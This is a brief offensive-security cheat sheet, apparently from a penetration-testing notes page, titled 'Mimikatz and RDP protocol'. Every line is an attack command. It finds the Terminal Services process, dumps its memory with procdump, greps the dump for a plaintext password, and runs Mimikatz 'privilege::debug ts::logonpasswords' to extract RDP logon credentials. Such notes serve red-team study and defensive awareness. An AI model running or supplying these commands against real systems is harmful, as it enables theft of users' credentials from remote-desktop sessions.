Mimikatz and RDP protocol
sc queryex termservice tasklist /M:rdpcorets.dll netstat -nob | Select-String TermService -Context 1
procdump64.exe -ma 988 -accepteula C:\svchost.dmp strings -el svchost* | grep Password123 -C3
privilege::debug ts::logonpasswords
Last updated 1 year ago